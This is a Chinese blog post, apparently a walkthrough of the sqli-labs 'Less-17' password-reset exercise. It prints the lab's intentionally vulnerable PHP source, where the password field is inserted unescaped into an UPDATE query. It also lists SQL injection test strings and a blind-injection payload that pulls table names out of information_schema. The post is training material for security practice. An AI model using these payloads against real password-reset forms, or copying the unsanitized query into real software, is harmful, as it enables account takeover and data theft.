2. 程式人生 > 實用技巧 >less-17

less-17

阿新 發佈:2021-01-09

less-17

基本測試

admin' or 1=1
admin') or 1=1
admin" or 1=1
admin") or 1=1

羞辱的回答

okok 檢視原始碼

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
	
	
	
		if (mysql_error())
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());
			echo "</br></br>";
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
			echo "<br>";
			echo "</font>";
		}
	
		echo '<img src="../images/flag1.jpg"   />';	
		//echo 'Your Password:' .$row['password'];
  		echo "</font>";
	


  	}
	else  
	{
		echo '<font size="4.5" color="#FFFF00">';
		//echo "Bug off you Silly Dumb hacker";
		echo "</br>";
		echo '<img src="../images/slap1.jpg"   />';
	
		echo "</font>";  
	}
}

?>

關鍵函式解釋

intval() 函式用於獲取變數的整數值。(函式通過使用指定的進位制 base 轉換(預設是十進位制),返回變數 var 的 integer 數值。 intval() 不能用於 object,否則會產生 E_NOTICE 錯誤並返回 1。)

get_magic_quotes_gpc() 函式是一個用來判斷是否為使用者提供的資料增加斜線了,這個在php.ini配置檔案中

// 去除斜槓
if(get_magic_quotes_gpc())
{
$value= stripslashes($value);
}

發現並不是通過第一句可以簡單的完成sql 注入

但是在判斷使用者名稱正確後對後面的修改操作卻某座限制 百密一疏

  • sql 注入的預防

    function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

原來如此

但是不得不承認是讀原始碼得出的sql注入

現在可用sql注入的盲注的方式修改密碼

admin' where 1=1  and 1=1#


UPDATE users SET password = 'passwd' WHERE  (if(((select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='a'),1,"'"))

苦思冥想的sql語句

python 指令碼自己產找less -10

相關推薦

less-17

less-17 基本測試 admin\' or 1=1 admin\') or 1=1 admin\" or 1=1 admin\") or 1=1 羞辱的回答 okok 檢視原始碼

sql-labs:less-17

輸錯密碼,就來這一套 進行程式碼審計 <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">

17.RxSwift 記憶體管理(下)

迴圈引用釋放不掉 self -> myClosure -> {} -> self -釋放不掉 myClosure = {() in //// weak - strong - dance

17張圖帶你解析紅黑樹的原理!保證你能看懂!

二叉查詢樹 由於紅黑樹本質上就是一棵二叉查詢樹,所以在瞭解紅黑樹之前,咱們先來看下二叉查詢樹。

安裝mysql 8.0.17並配置遠端訪問的方法

一、安裝前準備 檢視資料庫版本命令: mysql --version mysql-community-common-8.0.17-1.el7.x86_64.rpm

Mysql8.0.17安裝教程【推薦】

1.因為系統重灌 又雙叒叕開始了裝myql資料庫 下載安裝包    https://dev.mysql.com/downloads/mysql/

mysql 8.0.17 解壓版安裝配置方法圖文教程

記錄一下自己安裝過程遇到的問題,也希望對大家有用。 1、下載(官方推薦的是下載安裝版本,但是解壓版更便捷),下載地址:

mysql最新版8.0.17解壓版安裝教程

個人認為解壓版比安裝版容易安裝。廢話不多說,下面來看解壓版的安裝吧~ 首先去mysql官網下載最新mysql8.0.17 網址:

macOS 下的 MySQL 8.0.17 安裝與簡易配置教程圖解

如果我寫的這篇你看不懂,可能網上也沒有你能看懂的教程了 雖然這篇針對的是8.0.x版本,但是關於MySQL配置之類的方法還是通用的

windows 10 下mysql-8.0.17-winx64的安裝方法圖解

1、官網下載,並解壓 https://dev.mysql.com/downloads/mysql/ 下載下來之後是一個zip的壓縮包檔案:mysql-5.7.26-winx64.zip,然後對這個檔案進行解壓;

windows10更換mysql8.0.17詳細教程

本文例項為大家分享了windows10更換mysql8.0.17的具體步驟,供大家參考,具體內容如下

mysql 8.0.17 安裝配置方法圖文教程

本文為大家分享了mysql 8.0.17 安裝配置方法,供大家參考,具體內容如下 安裝程式下載:

win2008下mysql8.0.11升級mysql8.0.17版本詳細步驟

升級背景: 為了解決mysql低版本的漏洞,從mysql5.5升級到了8.0.11版本,再次升級到了8.0.17版本(從版本是2019.7.22釋出)

解決Mysql 8.0.17 winx64版本安裝過程中遇到的問題

一、手動建立新增my.ini檔案 # CLIENT SECTION # ----------------------------------------------------------------------

mysql 8.0.17 安裝圖文教程

本文為大家分享了mysql 8.0.17 安裝圖文教程,供大家參考,具體內容如下 安裝環境:windows x64

mysql 8.0.17 安裝配置圖文教程

本文記錄了mysql 8.0.17 安裝配置的圖文教程,供大家參考,具體內容如下 1.下載安裝包

mysql-8.0.17-winx64 部署方法

1、官網下載mysql-8.0.17-winx64,選擇Zip檔案格式下載 2、解壓到目標路徑,我這裡是E盤根目錄,即E:\\mysql8

mysql 8.0.17 安裝與使用教程圖解

寫在前面 以前包括現在接到的專案,用的最多的關係型資料庫就是SqlServer或者Oracle。後來因為接了一個要求以MySQL為資料庫開發的專案。所以,不得不學習使用它。但是,自從學習並使用它運用到實際的開發的過程中還是

mysql 8.0.17 winx64(附加navicat)手動配置版安裝教程圖解

一、下載地址: mysql-8.0.17-winx64 下載解壓 二、開啟檔案 在mysql資料夾下建立my.ini檔案,複製一下內容到檔案中;

mysql 5.7.17 winx64解壓版安裝配置方法圖文教程

本文為大家分享了mysql 5.7.17 winx64解壓版安裝配置方法,供大家參考,具體內容如下